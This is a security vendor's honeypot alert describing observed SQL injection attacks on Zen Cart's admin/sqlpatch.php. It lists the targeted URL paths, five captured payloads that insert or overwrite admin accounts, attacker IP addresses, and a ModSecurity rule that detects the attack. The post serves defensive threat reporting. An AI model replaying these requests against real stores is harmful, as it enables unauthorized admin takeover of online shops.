[Honeypot Alert] Zen Cart 'admin/sqlpatch.php' SQL Injection Attacks

Our web honeypot sensors picked up attacks aimed at exploiting a Zen Cart SQL Injection vulnerability.

Screen shot 2012-03-14 at 11.04.28 AM



The attacks send a POST request to the following URLs:

POST /admin/sqlpatch.php/password_forgotten.php?action=execute
POST /black_market/admin/sqlpatch.php/password_forgotten.php?action=execute
POST /cart/admin/sqlpatch.php/password_forgotten.php?action=execute
POST /product_info.php/products_id/1658/admin/sqlpatch.php/password_forgotten.php?action=execute
POST /shop/admin/sqlpatch.php/password_forgotten.php?action=execute
POST /shopping/admin/sqlpatch.php/password_forgotten.php?action=execute
POST /store/admin/sqlpatch.php/password_forgotten.php?action=execute
POST /tienda/admin/sqlpatch.php/password_forgotten.php?action=execute
POST /tradeshow/admin/sqlpatch.php/password_forgotten.php?action=execute
POST /zencart/admin/sqlpatch.php/password_forgotten.php?action=execute

The attacks include a POST payload parameter called "query_string" that included the following different payloads:

 insert into `admin` ( `admin_id`, `admin_name`, `admin_email`, `admin_pass`, `admin_level` ) values ( '2112', 'jembot', 'adm.net', 'abc22a464d79887aeb11486b74081fb5:3d', '0' );'
insert into admin (admin_id, admin_name, admin_email, admin_pass) values (666, 'nobody', 'crew.tools43@yahoo.com', '21232f297a57a5a743894a0e4a801fc3:be');'
insert into admin values (12, 'sales', 'admin@localhost', '351683ea4e19efe34874b501fdbf9792:9b', 1);'
show tables;'
update admin set admin_name='adminz', admin_email='admin@shopadmin.com', admin_pass='617ec22fbb8f201c366e9848c0eb6925:87' where admin_id='1';'

As you can see, the attacker(s) are attempting to add in new user account data to the "admin" group within the back-end Zen Cart DB.

There were a total of 116 attack requests detected from 4 source IP addresses:

125.165.165.31
173.230.128.50
193.107.86.145
209.239.114.225

These attacks are identified by the following ModSecurity rule from our SpiderLabs Commercial Rules Feed which identifies SQL Injection attacks against this Zen Cart vulnerability:

## (2055343) ModSecurity Rules from Trustwave SpiderLabs: Zen Cart admin/sqlpatch.php query_string Parameter SQL Injection#SecRule REQUEST_LINE "@contains admin/sqlpatch.php" "chain,phase:2,block,rev:'031312',t:none,t:urlDecodeUni,capture,logdata:'%{args.query_string}',severity:'2',id:2055343,msg:'SLR: Zen Cart admin/sqlpatch.php query_string Parameter SQL Injection',tag:'WEB_ATTACK/SQL_INJECTION',tag:'http://osvdb.org/show/osvdb/55343'"   SecRule "ARGS:query_string" "@pm # \" /* */ ` ' ( ) ; --" "ctl:auditLogParts=+E"

Trustwave reserves the right to review all comments in the discussion below. Please note that for security and other reasons, we may not approve comments containing links.